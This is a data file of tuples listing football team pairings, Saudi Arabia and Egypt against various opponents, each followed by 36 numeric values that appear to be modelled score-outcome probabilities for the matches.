('KSA', 'ICE',0.000586551779944689,0.000824520988244431,0.000746763315412371,0.000462257494247652,0.000216799151187009,0.00195526597870231,0.00372485611740331,0.0035479963458898,0.00225302269826966,0.00822990268808007,0.0156782778953044,0.0149338580952124,0.0259803393731452,0.0494935354577699,0.0546768744440047,0.0575350567216925,0.104161527112753,0.0471435345190601,0.00948318937820481,0.00107302350060171,8.17603220878128e-05,0.109606473149591,0.09921583704983,0.104402251781934,0.0299367425987199,0.063003315423379,0.06629675458591,0.0045164591867118,0.0142576585511372,0.0300059285319353,0.0315744602746078,0.000434600378771989,0.00185758633131692,0.00601562207137153,0.0133147129201228,0.0227414941917101),
('KSA', 'CRO',7.59321955237123e-05,0.000135364303141648,0.000145032707047454,0.000105681141850487,5.82250685654145e-05,0.000414182691103772,0.000924010910627106,0.00103069995595738,0.000766471756983589,0.00255421702000612,0.00569826901338036,0.0063562080853985,0.0118136719473407,0.0263554272266227,0.0364267780918763,0.0561599377428748,0.0812654442564649,0.0293985031662472,0.00472674317177339,0.000427485431762599,2.57680918694625e-05,0.125288662054576,0.0906485939209841,0.139754863255856,0.0218619611306676,0.0674100999511264,0.103927583354963,0.00263625349167266,0.0121931040615248,0.0375967351963162,0.0579636854688322,0.000200263139391502,0.00125020007275233,0.00590118170570881,0.0189438478708524,0.0494460617179709),
('KSA', 'NGA',0.000308757758404001,0.000405109559960444,0.000325369151271497,0.000177400579214857,7.30780300515019e-05,0.0013814822589338,0.00230171706493033,0.00191746995400444,0.00106491253291698,0.0070112780730492,0.0116816399800632,0.00973151479673555,0.0266876501126186,0.0444648632219949,0.0677223811039826,0.0859259036115834,0.112833703984773,0.0370419286263027,0.00540462814015322,0.000443568372634208,2.41720043255949e-05,0.14316298119889,0.0939973207334158,0.119263448647579,0.0205721158525515,0.0522036471552449,0.066235792075109,0.00225119156242263,0.00856891027976104,0.0217444025668422,0.0275892165720097,0.000154484654434276,0.000792778861381954,0.00307377388640656,0.00809033580624198,0.0153609672111756),
('KSA', 'BRA',3.31314993332401e-06,9.51961198991297e-06,1.58560467186127e-05,1.79708649316919e-05,1.54034671844172e-05,2.82793322027352e-05,9.81826809698106e-05,0.000170439647819676,0.000197249136418994,0.000264360083348599,0.000917828665065066,0.00159329927526214,0.00185346280015724,0.00643501570308118,0.00866324524250443,0.0202463783263976,0.0300778192960926,0.0111708276787072,0.00184391900665606,0.000171206739375582,1.06065837306941e-05,0.0702931628570251,0.0522134135814254,0.122025002812526,0.0129279550908344,0.0604263788981791,0.141219057503341,0.00160047017965979,0.0112211038186455,0.0524484086026878,0.12257419632744,0.000124983005449822,0.00118313399311127,0.00847017425992694,0.0412618933377709,0.215071884563759),
('KSA', 'SWI',8.46509035656936e-05,0.000150215003899503,0.00016089916033431,0.000117266525073567,6.46341584428427e-05,0.000447296554799299,0.000998592156683115,0.00111468139502714,0.000829510896318101,0.00269442557431056,0.00601532074504843,0.00671461925146489,0.012173013235184,0.0271763227537239,0.0366639065574936,0.0552140221194914,0.0818523843495812,0.0303356491998181,0.00499680882677853,0.000462971973547902,2.86189558717471e-05,0.123265625088911,0.0913679617474124,0.137595611995781,0.0225748376804297,0.0679931684353704,0.10239433433199,0.00278885118235758,0.0125996140615182,0.0379487858664931,0.0571489865367917,0.000217302810600917,0.00132550248425588,0.00611453609039598,0.0191922677323744,0.0490633117508024),
('KSA', 'CRC',0.000337709814191046,0.000392589851462272,0.000276011363646902,0.00013138082709009,4.71970161203114e-05,0.00159765711938916,0.00231750070576585,0.00168083922890746,0.00081272050429304,0.00828704232054318,0.0120208686792026,0.0087185076540772,0.0322386463226527,0.046764155273973,0.0836108771996687,0.108422337528266,0.121282761218514,0.0339171532917564,0.00421557863205633,0.000294725369954477,1.36066447694494e-05,0.157273322725597,0.0879640823146708,0.114067352747774,0.0163996445664692,0.0425324517115905,0.0551539224300472,0.00152873954248976,0.00594717530373984,0.0154239895505941,0.0200010460013878,8.87783001038092e-05,0.000464853982949318,0.00183697738608809,0.00491482658167421,0.00901989638563606),
('KSA', 'SRB',0.000230645006683659,0.000371629669149729,0.000374146705559096,0.000257062512224965,0.000133732200699417,0.000947617825174236,0.0020005323629572,0.00211167921757026,0.00148600082674211,0.00470827117797942,0.00993971262981951,0.0104919495318654,0.0175449033063375,0.037039348497723,0.043586222400616,0.0541399046203275,0.0920156271600842,0.0390972042758486,0.00738324530959204,0.000784280504836471,5.59250784005373e-05,0.114295688032743,0.0971278901374115,0.120645800860659,0.027512927812997,0.0683494556573712,0.084899144874943,0.0038967241838172,0.0145207543134505,0.0360734291822598,0.0448080128923511,0.000350684529404337,0.00176766506586738,0.00674658152833422,0.0175724712685512,0.0366608084452574),
('KSA', 'GER',9.25656165665694e-06,2.54962240741151e-05,4.20885400735845e-05,4.75040462429947e-05,4.06290084501707e-05,5.94383624574108e-05,0.000206539704395302,0.000358847785571691,0.000415648034314494,0.000449645885591535,0.00156245435528583,0.00271465134073232,0.00255114812307788,0.00886487038714572,0.00964960346862239,0.0182495963796311,0.0335309750393814,0.0154020705951957,0.00314434013247986,0.000361079186027863,2.79438896022008e-05,0.0634147053476339,0.0582576419200848,0.110178460133389,0.0178399884983746,0.0674789571553404,0.127618065986621,0.0027315316852227,0.0154978443152352,0.0586199017248901,0.110863575873508,0.000267003365248327,0.0020515949731856,0.0119455292631558,0.0475551891954284,0.204812928181547),
('KSA', 'MEX',0.00011388993825642,0.000195738106752434,0.000204831468228383,0.000145943903079626,7.86614918484999e-05,0.000562023237707338,0.00122748516856573,0.00134044265250954,0.000975863253140175,0.0032068603506052,0.00700393374140017,0.00764846025251241,0.0137235695318868,0.0299729209220768,0.0391528036991048,0.0558507039272411,0.0855115636222904,0.0327311340724324,0.00556819890023379,0.000532832803615156,3.40645259963474e-05,0.121980562590801,0.0933806371738356,0.133205641144219,0.0238287784375496,0.0679825669543987,0.0969757938247162,0.00304030203161285,0.0130107930396475,0.0371192804224427,0.0529499229939818,0.000245069883210716,0.00141658124263087,0.00619412511305048,0.0184410838986095,0.0443517809375777),
('KSA', 'SWE',9.04426036006911e-05,0.000168261773646896,0.000191362745545442,0.000148423156394243,8.71414409620588e-05,0.000443794434759074,0.00105690223136063,0.00125851322049756,0.000999055213226379,0.00256211166039394,0.00610170231705474,0.00726564180271259,0.0110936770149398,0.0264197364201947,0.0320229784450226,0.046218722030098,0.0762631405951079,0.0314594733365936,0.00576774022092968,0.000594815753314174,4.11206100918285e-05,0.110070488988367,0.0908108317190775,0.131067152162369,0.0249737152779803,0.0720890598276744,0.104046043790292,0.00343398713005401,0.0148688071184305,0.0429202589200567,0.0619467523888075,0.000299525574559277,0.00175355749021226,0.0077711431982594,0.0234867082870573,0.0600175693397711),
('KSA', 'KOR',0.000556626094784477,0.000719374790037828,0.000587029619970727,0.000326201944756857,0.000137126775052802,0.00205179844683334,0.00349534461130106,0.00297725002438891,0.00169063305500023,0.00907796080099746,0.0154647750203439,0.0131725214325433,0.0301233434130556,0.0513166711066079,0.0666387410324705,0.0737089795362495,0.113522536646433,0.0437102996396215,0.00748002350126025,0.000720020178834175,4.63162282901398e-05,0.125567053052486,0.0966957518027034,0.106954979647572,0.024820917561291,0.0549087355568341,0.0607344437006686,0.00318565157775205,0.0105709287112612,0.0233849666420871,0.0258660653093309,0.000258387310012078,0.00115820219170449,0.00392741477808756,0.00906882219826348,0.0153618753012223),
('KSA', 'BEL',4.06194533918646e-05,9.71077845324604e-05,0.000144677191604745,0.000147989665297138,0.000114909811441546,0.000188969276161056,0.000597726529147529,0.000945330931315655,0.000996721773948628,0.00111498108935695,0.00352678377218554,0.00557776445469799,0.00493406727886835,0.0156068910729424,0.0145563125956633,0.021471761977196,0.046042903808219,0.024682988211964,0.0058809873852502,0.000788179775267168,7.18144366488814e-05,0.0679170816655552,0.0728188879278568,0.107413867265868,0.026024824727508,0.0767775270522536,0.113253186562843,0.00465052077400935,0.0205797054315701,0.0607135266824553,0.0895574607342664,0.000536148079849161,0.00322171169676325,0.0146954536974707,0.0460219077774596,0.146667893736182),
('KSA', 'TUN',0.000539264023074218,0.000680267897994562,0.000538509868147844,0.000289991212400256,0.0001180868352951,0.00205249492745817,0.00338484679231452,0.00279103925036994,0.00153426936285427,0.00924064136271976,0.0152390901712318,0.0125656791629116,0.0312020696076048,0.0514565097394268,0.0702382089137637,0.0790557494014933,0.115832479271506,0.0424294354166557,0.00690751180247865,0.000632555367363942,3.86278361769901e-05,0.130373817833038,0.0955118550264936,0.107502189942184,0.0233239940406966,0.0525040674139945,0.0590953052509642,0.00284785955554707,0.00961611955241044,0.0216466094254631,0.0243640741499043,0.000219188840252822,0.000999122519405522,0.00344385241128835,0.00807509791464607,0.0137002316193552),
('KSA', 'PAN',0.00149771886227677,0.00145006452502258,0.000901506332618838,0.000380658441464417,0.000121462433338417,0.00480064954801496,0.0061974483973864,0.00400033019012489,0.0017214226031876,0.018382268088361,0.0237307799215726,0.0153177484132842,0.0527909468332412,0.0681510211432667,0.101071462061661,0.0967537149461527,0.130479253757348,0.0439901343078906,0.00659153547216194,0.000555572097413415,3.11233490796419e-05,0.124905213271016,0.0842217739498417,0.0806238412187104,0.0189298402671349,0.0362423246250301,0.0346940617482787,0.00212735279568351,0.00610941847832057,0.0116968513540957,0.0111971648435367,0.000150104597589533,0.000581352439844175,0.00170147210453022,0.00338216971642023,0.00451896891094668),
('KSA', 'ENG',1.28969897708897e-05,2.84972170085205e-05,3.651160048719e-05,3.17452193199495e-05,2.08504208861336e-05,9.93779451623232e-05,0.000263939302065713,0.000350500078569481,0.000310299386047545,0.00082035527021667,0.00217879326356818,0.00289334405331257,0.00507896471601184,0.0134892948346932,0.020963179834415,0.0432622525792123,0.0556764083372417,0.017913205280166,0.00256149124711032,0.000206032141364548,1.09954490851577e-05,0.114900833710104,0.0739358835305671,0.152583381587724,0.0158586458047748,0.0654557892256502,0.135082793193564,0.00170077528496245,0.0105298008994417,0.0434612410634962,0.0896920793098504,0.000114282793066072,0.000953696901616856,0.00601213785885039,0.0257197373508107,0.0973477644258117),
('KSA', 'POL',0.00020619459041188,0.000387291611895809,0.000468995985457438,0.000390268802656149,0.000246610683006532,0.000727641814964728,0.00187410819181367,0.00241346871660568,0.00207203663462541,0.00339383684021211,0.00874113786908857,0.011256800907618,0.0118720450032197,0.0305775401255534,0.0276865504922474,0.0322836157524622,0.0713092486075704,0.0393776287015532,0.00966430752086684,0.0013341800700657,0.000125449735747146,0.0831494115631424,0.0918317530817022,0.107079465576429,0.0338068973891847,0.0788403658592979,0.0919309929164999,0.00622282746832689,0.0217681907615309,0.0507651472413179,0.0591941747172433,0.000740631563434371,0.00352001485912831,0.0127039892154215,0.0315064457121594,0.0701813767032672),
('KSA', 'SEN',0.000337122730056149,0.000442647519640085,0.00035746579204503,0.000196067779794754,8.12684447983184e-05,0.00146340119669826,0.00245409754663319,0.00205773877388488,0.00115026366613077,0.00726997499929558,0.0121916176166246,0.010222561984353,0.0270871736726894,0.0454247041791103,0.06728266856906,0.0835627508516749,0.112831827826031,0.0380882068888587,0.00571435100247021,0.000482242881754129,2.70506431967824e-05,0.140133233673514,0.094608475268008,0.117500459113967,0.0212910798242931,0.0528855717693297,0.0656820538096355,0.00239571602227114,0.00892618970106372,0.0221720387109549,0.0275369063992389,0.000169262162268676,0.000850515244658688,0.00322959671669856,0.0083293244147166,0.0155536927064127),
('KSA', 'COL',2.27668998404537e-05,4.68042562095854e-05,5.63133407067193e-05,4.6000122494175e-05,2.83909005015174e-05,0.000158548231399648,0.00039580909114534,0.000494060498973335,0.000411133855700398,0.00119846283705119,0.00299191282120949,0.00373459320263236,0.0067943670473954,0.0169618558478817,0.0256792407449291,0.0485272138402368,0.0641071606464816,0.0211722852031234,0.00310775240291697,0.000256594659440986,1.40702933901839e-05,0.121146178903149,0.080020435319244,0.151218208314535,0.0176185776188078,0.0665892338610148,0.125836664063718,0.00193959378046087,0.0109960122749584,0.0415593158969971,0.0785365046272164,0.000133938894282048,0.00102379751598567,0.00591280990760874,0.0231843815091947,0.077804700248025),
('KSA', 'JPN',0.000552641679440138,0.000840378654044865,0.000835375097867266,0.000569400902205376,0.00029445329726697,0.00172458322205066,0.00363004451119624,0.00382040802229226,0.00268050293630978,0.00708354919267043,0.014910036545564,0.015691935196842,0.0218212153478964,0.0459310875743493,0.0448142050741052,0.046017440926304,0.0943286221696175,0.0483397641269766,0.0110098916466729,0.00141053572346984,0.000122525146289972,0.0968612918866261,0.0992753184587881,0.101940804150446,0.0339165028779145,0.0696542832805078,0.071524461068192,0.00579363121330663,0.0178475607231856,0.0366535151030665,0.037637641082947,0.000636430496232,0.00266003450904954,0.00843500229045763,0.0183405878883017,0.0323236608998333),
('EGY', 'URU',0.000543325944078518,0.000675832340282234,0.000526534127171318,0.000278943681760322,0.000111727404741466,0.00208622724235973,0.00338325873783598,0.00274333482343863,0.0014829658891346,0.00942613430285647,0.015286470522781,0.0123951226205763,0.0319423524765406,0.0518012807660665,0.0721620584468272,0.0815118843095191,0.117026040990774,0.0420033667053107,0.00670043768660912,0.000601235713978641,3.59458352134367e-05,0.132188761237595,0.0948912390024575,0.107186017999398,0.0227057811247084,0.0512954049269049,0.057941599810276,0.00271654423476235,0.00920555666585375,0.0207965871845161,0.0234911398746502,0.00020466582504639,0.000936025689276917,0.00323655792531709,0.00760994378513853,0.0128616423379486),
('EGY', 'POR',0.000264301835123611,0.00037254896421191,0.000322473875373878,0.000189731319533226,8.43853162323673e-05,0.00117614848777822,0.00211745588466027,0.00190606010638678,0.00114384598847407,0.00601895404364695,0.0108361059778221,0.00975428553791091,0.023101552326932,0.0415904270827693,0.0591112360546301,0.0756256155096709,0.106419755612542,0.0374382552403324,0.00585364561462887,0.000514825178242328,3.01442944125773e-05,0.136151095083671,0.0957953609206087,0.122558478152897,0.0224670764204288,0.0574877670102333,0.0735485849155223,0.00263462404666819,0.0101120402040851,0.0258742437321296,0.0331029384376453,0.00019436496309095,0.00100656360450827,0.00394046823318201,0.0104854663807049,0.0207497440836759),
('EGY', 'ESP',6.20768525332609e-05,0.000114379475544537,0.000126238046987264,9.47542999250973e-05,5.37758413216943e-05,0.000350122811663772,0.000804598646033929,0.00092450271680858,0.000708183537717432,0.00222497106292357,0.00511308787960992,0.00587505790530632,0.0106044851961859,0.0243696044544842,0.0336948520814651,0.0535312669963538,0.0774323507635237,0.0280012471270938,0.00450038622497208,0.000406859747929075,2.45151503712379e-05,0.123017362796426,0.088971587266049,0.141349835325384,0.0214493931607031,0.0681536271130848,0.108276184176139,0.00258552466635592,0.0123229279273042,0.0391550580758427,0.0622059376621706,0.000196331539475518,0.00126300376142746,0.00614325923307461,0.0203216765332843,0.055427998458042),
('EGY', 'MAR',0.000529608750863988,0.000582265531647851,0.000393204796291311,0.000179919044517318,6.21518248294128e-05,0.00224243852918883,0.00312942475165277,0.00218362714268015,0.00101578359744469,0.010641756957423,0.0148510548628859,0.0103626605748876,0.0378762861278385,0.052858076494082,0.0898731952237892,0.106625966343051,0.125422123274516,0.0368829224864353,0.00482052106429579,0.000354393029149856,1.72327928317569e-05,0.148801375778867,0.0875161329666629,0.103829536993109,0.0171572641479264,0.040710911969254,0.0482996105637464,0.00168181398710712,0.0059859352214426,0.0142034813798247,0.0168510747146382,0.00010290361902406,0.000493208627303762,0.00178463374127524,0.00437550454553853,0.00729978860314597),
('EGY', 'IRN',0.000250785302462109,0.000217786974893202,0.000109923024019519,3.73396709487478e-05,9.54931776990826e-06,0.00150174447511659,0.00154508761541065,0.000794840859697528,0.000272593815368326,0.00902584488783442,0.00928634756836898,0.00477718442052926,0.0406856212670212,0.0418598840126129,0.122265176535043,0.183710767190158,0.12579397706499,0.021534019083171,0.00163835428441078,7.01153450440426e-05,1.95747275975709e-06,0.189013001816481,0.0647123126726597,0.0972341344007814,0.00738517698288651,0.0221933434819408,0.0333468308240118,0.000421410059507885,0.00189958173360149,0.00570847116914468,0.00857732060498752,1.47625453799798e-05,8.92376832513665e-05,0.00040612092620641,0.00124390582965477,0.00236534221665415),
('EGY', 'FRA',0.000133105887730826,0.000206737936628946,0.000193559854082384,0.000123078022244033,5.91397292665171e-05,0.000685877478531046,0.00133334431765841,0.00129600921817665,0.000839813028214941,0.00396231225710897,0.00770272635882356,0.0074870415945216,0.017167700042208,0.0333739713214771,0.0495888773380477,0.0716187010957254,0.0964006690514961,0.0324394636156377,0.00485159749304297,0.000408148672363504,2.28198529698057e-05,0.139226598238186,0.093701344862327,0.135328101183157,0.0210207487652328,0.0607184031355536,0.087692510873572,0.00235787372796125,0.0102160724022737,0.0295091107129925,0.0426185123197566,0.000166041736947873,0.00097018907638843,0.00428379908179953,0.0128461184030304,0.0294130793171823),
('EGY', 'AUS',0.00477967158577463,0.00393331384382593,0.00221934141952867,0.000853232755326284,0.000248213945302594,0.0108722152021842,0.0128220553860415,0.00756079148845795,0.00297225191078026,0.0323912994288159,0.0382004060422473,0.0225256634887326,0.0723768978429825,0.0853570846009512,0.107815276195502,0.0803027908596633,0.127151037496238,0.0503325792394428,0.00885515047573856,0.000876325061465757,5.80248118172351e-05,0.0947044197441431,0.0749772523285715,0.0558444297082332,0.0197864344027089,0.0294745969173793,0.0219532192046448,0.00261081177433006,0.00583374117155169,0.00869015437810593,0.00647258602109243,0.000218029935012746,0.000658335712770544,0.00150415974449968,0.00234163063632169,0.00242452404636833),
('EGY', 'PER',0.000610742808384726,0.000657499365239925,0.000436901444478033,0.000196750330766046,6.68959854884316e-05,0.00249948124320485,0.00343362989685493,0.0023584522389652,0.00107996437794588,0.0115390541218756,0.0158516257411466,0.0108879824976737,0.0399532214103101,0.0548852190361735,0.0922236134898379,0.106439413204966,0.126690991314932,0.0376989284257237,0.00498574151764256,0.00037089675965108,1.82568951488085e-05,0.146219761551663,0.0870200519855407,0.100433749230909,0.0172628044417709,0.0398475554258487,0.0459898528878079,0.00171227441489199,0.00592863835205491,0.0136850154405784,0.0157944907825215,0.000106063020919906,0.000494587737452283,0.00174130677833666,0.00415480919972027,0.00672184166166679),
('EGY', 'DEN',0.000832095564946362,0.000890227798596377,0.000597807888940108,0.000272461663397775,9.38133476431494e-05,0.00307582091117431,0.00428290005695659,0.00298184345376526,0.0013840139881108,0.013200941518154,0.018381536120839,0.0127976049926838,0.0424922797843887,0.0591680051486784,0.0911851041731483,0.0978380457021591,0.126969904664465,0.0411939868964175,0.00593997122881335,0.000481789557949702,2.59357533564392e-05,0.136233735191793,0.0883990693254627,0.0948487394198733,0.0191200695055614,0.0410301715631408,0.0440237672256135,0.0020677653095619,0.00665589359225068,0.0142830263204128,0.0153251278766778,0.000140160422869111,0.000608172718542044,0.00199362714486254,0.00443551664640131,0.0067468644177922),
('EGY', 'ARG',0.000172487649156569,0.000256646031909579,0.000231479731798408,0.000141808887778366,6.56515249881667e-05,0.000846503725651906,0.00158559925563423,0.00148500527716617,0.000927195471102523,0.00468734832988334,0.00877994484553232,0.00822292542236861,0.0194664539267737,0.0364629167253339,0.0538958350314073,0.0746094035580239,0.100953124384388,0.0341496273825715,0.0051341630417525,0.000434186053840281,2.4407854674151e-05,0.139752030806257,0.0945484314050487,0.130885848050534,0.0213220655413306,0.0590333776900101,0.0817214372298074,0.002404220102823,0.00998467290409199,0.0276440838021028,0.0382684228415983,0.000170234563343854,0.00095347496815773,0.00403572660720246,0.0116023575231998,0.0251138540962011),
('EGY', 'ICE',0.00328497244982177,0.00293273970887444,0.00176129267403775,0.000720515739632975,0.00022300743050046,0.00822968182630851,0.0103243268837375,0.00647605386526084,0.00270811996675678,0.026430889353516,0.0331581642246793,0.0207988433541784,0.063665150739901,0.0798694094393678,0.102235213365232,0.0820860292511948,0.128256448315786,0.0500990140607283,0.00869754392795315,0.000849349840226895,5.54623295900319e-05,0.102978829128989,0.0804503457913947,0.0645946657763518,0.020950125356504,0.0336422754200467,0.0270118358763641,0.00272781768764119,0.00657060464185788,0.0105512538601109,0.00847174378072353,0.000224629492364435,0.000731035312840684,0.00180000559213196,0.00301900120970807,0.00341194467699963),
('EGY', 'CRO',0.000516268948923905,0.000593549695057811,0.000421107183795121,0.00020263793441214,7.36452454078245e-05,0.00213988516170079,0.0031437692717822,0.00230930271658753,0.00113088855570188,0.0100692283873064,0.0147930044850684,0.0108664225935683,0.0355355612524389,0.0522063555187043,0.0836062814318342,0.0983523271970176,0.122828487807481,0.0383489589088492,0.00532139544296981,0.000415355547444422,2.14873708603244e-05,0.144492344535209,0.0902255019521056,0.106139011776809,0.0187798673779697,0.0441843275276058,0.0519773318888528,0.00195445528760453,0.00689751616671817,0.016228129161058,0.0190903630888685,0.000127277209207341,0.000605246951193778,0.00217375423527902,0.00529518097173718,0.00893032434987073),
('EGY', 'NGA',0.00167693783100712,0.00140484731414402,0.000746765977991855,0.000268809509847937,7.30328355391063e-05,0.00563592586428523,0.00618367905628729,0.00339233407180521,0.00124067784997453,0.0218251394298715,0.0239463152715126,0.0131368236369167,0.0633884373131845,0.0695491320615571,0.122735954652003,0.118823836040561,0.134664608887873,0.0381542910311643,0.00480452861078956,0.000340314698118372,1.59244250322894e-05,0.130372273164193,0.0738763019293783,0.0715215489432478,0.013954163346494,0.0270187692313674,0.0261575657619524,0.00131786966601806,0.00382759060851621,0.0074111779255925,0.00717495206025727,7.75767525649384e-05,0.000303299360733741,0.000895003683292646,0.00178847493272391,0.00229470863746182),
('EGY', 'BRA',3.63481032689754e-05,6.82623323469395e-05,7.52999262513996e-05,5.63635568813673e-05,3.18698108825404e-05,0.000239041543890975,0.000546530200921723,0.000624776881159561,0.000476150754429977,0.00170506127480292,0.00389834949161352,0.0044564758414679,0.00912153355284095,0.0208549254000054,0.0325315285673903,0.0580110978488545,0.0743781292357102,0.0238407232139343,0.00339633939411402,0.00027216060778784,1.44682592784842e-05,0.132633083132548,0.085026839380511,0.15162214984346,0.0181693316234792,0.0648000829395083,0.115553253030534,0.00194129650148814,0.0103853166076882,0.0370387525241495,0.0660485009927189,0.000129935218612497,0.000936899877380311,0.0051031312246032,0.0188612600654826,0.0569774515475949),
('EGY', 'SWI',0.000573202503465829,0.00065560417602397,0.000465066152440608,0.00022385257127757,8.1391692423469e-05,0.00230117852467533,0.00338312429167934,0.00248688440514751,0.00121871451974666,0.0105769591377876,0.0155499310494381,0.0114305232956047,0.0364613382021978,0.0536043760430953,0.0837940386063946,0.0962861108804107,0.123191505772985,0.0394037804514312,0.00560160523738922,0.000447929468766333,2.37602185827853e-05,0.141556979251233,0.0905562456889225,0.104056432394606,0.0193100890695482,0.0443777005663799,0.050993558353518,0.00205882839464655,0.00709727979654442,0.0163106941926827,0.018742303577826,0.000137498589484771,0.000638849287986339,0.00224217354664819,0.0053396693747024,0.00881734668384206),
('EGY', 'CRC',0.00171861313403633,0.00127440765812285,0.000592549796435609,0.000186142181207568,4.40928682356639e-05,0.00608734403416997,0.00581485898007329,0.00277728552619496,0.000884322379435679,0.0240926016581598,0.0230141553227296,0.0109919914987541,0.0715156049256272,0.0683143839386859,0.141522885197863,0.14003046646642,0.135187959684767,0.0326282288863773,0.00349998730243361,0.000211184463227175,8.37832842892124e-06,0.13376234542445,0.0645683008023003,0.0638874007383983,0.0103892353643252,0.0205593529592321,0.0203425458794456,0.000835829734669891,0.00248104666892622,0.00490976596313684,0.00485799040273794,4.16749945667636e-05,0.00016628734578271,0.00050031837951237,0.00101703799515592,0.00128322702474728),
('EGY', 'SRB',0.00143989448352058,0.00148560681032622,0.000991353031838314,0.000450028414955137,0.000154483107851143,0.00447675904639923,0.00622373544314211,0.00432621931008089,0.00200481674174631,0.0169719538553774,0.0235949600267285,0.0164012388734642,0.0482571009546646,0.0670885849521884,0.0914743547852562,0.0866976819767922,0.127170611175392,0.0466343620093899,0.00760051119051721,0.000696790294233455,4.25996792398806e-05,0.120529925905042,0.088398351563609,0.0837823036754527,0.0216108669015522,0.0409647506182911,0.0388256241839668,0.00264161921560574,0.00751103180326396,0.014237630822883,0.0134941601073118,0.000203552543077133,0.000781323713576901,0.00226785322277997,0.00447801991290532,0.00608704343952276),
('EGY', 'GER',9.83476783594986e-05,0.000176632906890028,0.000193366424685275,0.000144238833494397,8.14149780504742e-05,0.000487423426397678,0.00111536793998431,0.00127614469696194,0.000973397942928743,0.00281352035448451,0.00643816081036078,0.00736620130613197,0.0121802159422272,0.027871911008565,0.0351535068069475,0.0507285357947497,0.0804415470144011,0.0318895587300778,0.00561867726728618,0.00055685508717404,3.69282067537231e-05,0.116081787217274,0.0920369413157843,0.132814609296797,0.0243242250997567,0.0702025166609375,0.101306276465483,0.00321429590252019,0.0139152425652471,0.0401609935782709,0.0579546277267959,0.000268843623774298,0.00157279841398947,0.00696253448001008,0.0210016462252709,0.0524024884297831),
('EGY', 'MEX',0.000750770162544534,0.000830193696054509,0.000575458460281496,0.0002708147231136,9.629502877989e-05,0.00281146702201022,0.00404361704110442,0.00290788379289242,0.00139409643511591,0.0122404855220103,0.0176049853904397,0.01266026212932,0.0399692094842932,0.0574860652196449,0.0870084063210666,0.0947036840134005,0.125140601602235,0.0413399181154171,0.00606957758946832,0.000501267848586302,2.74941111253168e-05,0.136208402066956,0.0899922825363691,0.0979514629600273,0.0198191663000952,0.0431440625579831,0.0469598495169349,0.00218240576725057,0.00712627233079244,0.0155130813571838,0.0168851036014114,0.000150746261788783,0.000663678332955673,0.00220771003319057,0.00498597581169426,0.00777435066165386),
('EGY', 'SWE',0.000637435497452725,0.000764305096388367,0.000576035688586976,0.000295165449696276,0.00011434215142724,0.00238092858454005,0.00373400053313682,0.00292800886007245,0.00153066142842078,0.0104882358661062,0.0164486572885893,0.0128981808786261,0.0346513201710524,0.0543435232928666,0.0763213187883521,0.0840508193171151,0.119694411204049,0.0426133623380596,0.0067427213889028,0.000600132509946669,3.55777508344172e-05,0.131816555178753,0.0938581270667883,0.10336368140349,0.0222767871216663,0.049065771898448,0.0540349458573642,0.00264364557429805,0.00873414846721939,0.0192374122030804,0.0211856959874328,0.000197483334304836,0.000880468257864855,0.00296771140943671,0.00680084884480377,0.0110815117177414),
('EGY', 'KOR',0.00296085010447631,0.00243090773673033,0.00131401882221773,0.000482286339483602,0.000133752158538041,0.0081784120180264,0.00917485760787519,0.00514635432521893,0.00192445950100024,0.0276097495824184,0.0309736805200614,0.0173737339068397,0.0699064442758237,0.078423741759384,0.117999644454117,0.0995896461015781,0.132376546114349,0.0439893870676351,0.00649684129229584,0.000539733198048777,2.97858871080887e-05,0.111723500868713,0.0742525540743403,0.0626678632517173,0.0164496629139281,0.0277664583764973,0.0234344075865823,0.00182210169976746,0.00461346636120127,0.00778737062029411,0.00657240526210637,0.000126638173104221,0.000432347184641203,0.001115303583771,0.00195354682123694,0.00222671082582481),
('EGY', 'BEL',0.000371278399844309,0.000575326333925838,0.000569102683731628,0.000384967732059455,0.000197346600099804,0.00133007487321021,0.00277052749815773,0.00288548516051659,0.00200347517866732,0.0059881444278312,0.0124732217218754,0.0129907738530793,0.0202194671954937,0.0421168695022479,0.0455151406357241,0.0512285513525164,0.0948074061495784,0.0438644272749359,0.00901986720377564,0.00104330274674263,8.13573135860659e-05,0.106708361364932,0.0987412554950585,0.111136017753405,0.0304563310441904,0.0685588881903595,0.0771649274346,0.00469706454522314,0.015860028700352,0.0357018031090367,0.040183368180416,0.000462670927156537,0.00211596973802468,0.00733361858957237,0.0173813898493044,0.0329973178293525),
('EGY', 'TUN',0.00283120028840719,0.00226940789259768,0.00118968000771743,0.000423090757817708,0.000113650439519923,0.00806961755218942,0.00876364788438091,0.00475868427126243,0.00172265220239468,0.0277212526179833,0.0301054288244509,0.0163473284774318,0.0714223296587533,0.0775650325636147,0.122677216747279,0.105357103169026,0.133228114474563,0.0421180204100026,0.00591776209549755,0.000467702379679204,2.45099634277607e-05,0.11441837835812,0.0723432229596977,0.0621294858738615,0.0152467985863133,0.0261883758736513,0.0224909848128805,0.00160668033314682,0.00413952623251251,0.00711017911741763,0.00610633249340195,0.000105999299090274,0.000368041918917932,0.000965218828834689,0.00171727582698045,0.00196939129931559),
('EGY', 'PAN',0.00671444029488802,0.00408351651766817,0.00168045189143314,0.000468494640461861,9.8598722472924e-05,0.0159107500265072,0.013526287445753,0.0057495860270674,0.00162930834324034,0.0464867966264347,0.0395200586115583,0.0167986949629142,0.101866140360476,0.0865999838605783,0.148812298042773,0.108697060526715,0.126510561440295,0.0368108440062301,0.00476038687477223,0.000346283062579019,1.66551172189361e-05,0.0924071890227245,0.0537755359148423,0.0392792985463613,0.0104313971438497,0.0152388239632902,0.0111309037793208,0.00101174302144596,0.00221702427593687,0.00323876487468048,0.00236569306599752,6.12263294417765e-05,0.00018065022180041,0.000402371203583499,0.000607158474279332,0.000563148769231446),
('EGY', 'ENG',0.000106017777984956,0.000152308854704398,0.00012914024215154,7.4125566489588e-05,3.21094339236802e-05,0.000624658599576773,0.00109252609324037,0.000955412496698016,0.000557004569193331,0.00393454537715147,0.00688150854320854,0.00601786932046216,0.0185869297269172,0.0325084866095505,0.0585368699654738,0.0921767391306299,0.102380817133117,0.0284286247693961,0.00350841204180447,0.000243549847192583,1.11619861218204e-05,0.161216851506175,0.0895318772854367,0.140983904696013,0.0165738609733104,0.0521969985831235,0.0821934812134004,0.00153405064146524,0.00724690878799563,0.0228231000820009,0.0359390405337986,8.843284316149e-05,0.000562250568278195,0.0026977668446313,0.00876292122863032,0.0206945102663883),
